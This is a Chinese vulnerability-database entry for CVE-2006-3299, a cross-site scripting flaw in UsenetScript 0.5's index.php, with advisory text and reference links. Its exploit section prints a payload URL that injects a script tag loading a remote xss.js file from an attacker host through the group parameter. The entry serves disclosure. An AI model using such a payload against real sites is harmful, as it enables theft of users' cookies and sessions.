Usenet Index.PHP 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110506 漏洞类型 跨站脚本
发布时间 2006-06-23 更新时间 2007-07-06
CVE编号 CVE-2006-3299 CNNVD-ID CNNVD-200606-558
漏洞平台 PHP CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/28109
https://www.securityfocus.com/bid/18662
https://cxsecurity.com/issue/WLB-2006070021
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-558
|漏洞详情
UsenetScript0.5的index.php中的跨站脚本攻击(XSS)漏洞。远程攻击者通过group参数注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/18662/info

Usenet is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>
|受影响的产品
MetalheadWs Usenet 0.5
|参考资料

来源:XF
名称:usenet-index-xss(27406)
链接:http://xforce.iss.net/xforce/xfdb/27406
来源:BID
名称:18662
链接:http://www.securityfocus.com/bid/18662
来源:BUGTRAQ
名称:20060625UsenetScriptv0.5
链接:http://www.securityfocus.com/archive/1/archive/1/438443/100/0/threaded
来源:VUPEN
名称:ADV-2006-2572
链接:http://www.frsirt.com/english/advisories/2006/2572
来源:SECUNIA
名称:20872
链接:http://secunia.com/advisories/20872
来源:SREASON
名称:1170
链接:http://securityreason.com/securityalert/1170